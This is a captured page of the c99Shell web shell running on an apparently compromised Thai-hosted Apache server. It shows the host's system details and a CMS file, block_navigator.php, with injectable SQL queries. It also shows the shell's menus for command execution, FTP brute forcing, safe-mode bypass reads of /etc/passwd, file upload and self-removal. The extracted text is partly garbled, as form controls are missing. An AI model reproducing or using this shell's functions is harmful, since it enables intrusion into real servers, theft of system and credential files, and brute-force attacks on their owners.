!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/alumni/blocks/   drwxr-xr-x
Free 52.34 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     block_navigator.php (7.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
(GPLv2) or write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA02110-1301, USA. ********************************************************************************/ if (stristr(htmlentities($_SERVER['PHP_SELF']), "block_navigator.php")) { die("
Error: This file cannot be opened directly!
"); } global $dblink,$siteConfig,$userid; $myrank = myRank(); echo "\n"; $nav_res = $dblink->get_list("SELECT * FROM memht_navigator ORDER BY position"); foreach ($nav_res as $nav_row) { $type = intval($nav_row['type']); $content = outCode($nav_row['content']); $html = outCode($nav_row['html']); $icon = outCode($nav_row['icon']); //===TYPE=== //0 = Page //1 = Manual link "url|name|target" //2 = Spacer //3 = HR line //4 = HTML //5 = Title //6 = MyPage if ($icon!="") { $icon = "$icon "; } switch($type) { case 0: $mtitle = ""; if ($pag = $dblink->get_row("SELECT titolo FROM memht_pagine WHERE nome='$content' AND enabled=1 AND rank<=$myrank")) { $mtitle = outCode($pag['titolo']); } else { $pag = $dblink->get_row("SELECT title FROM memht_virtualpages WHERE name='$content' AND enabled=1 AND rank<=$myrank"); $mtitle = outCode($pag['title']); } echo ($mtitle!="") ? "" : "" ; break; case 1: $link = explode("|",$content); if (!eregi("http://",$link[0])) { $link[0] = "http://".$link[0]; } if (isset($link[2])) { echo ""; } else { echo ""; } break; case 2: echo "
$icon
"; break; case 3: echo "
"; break; case 4: echo "
$html
"; break; case 5: echo "
$icon$content
"; break; case 6: $row = $dblink->get_row("SELECT id,title FROM memht_mypage WHERE id=$content"); $mtitle = outCode($row['title']); echo ""; break; } } if (isAuth($userid,3)) { ?> " : ""; echo (isset($_COOKIE['hideadminmenu'])) ? "
Show Menu
" : "" ; } ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]--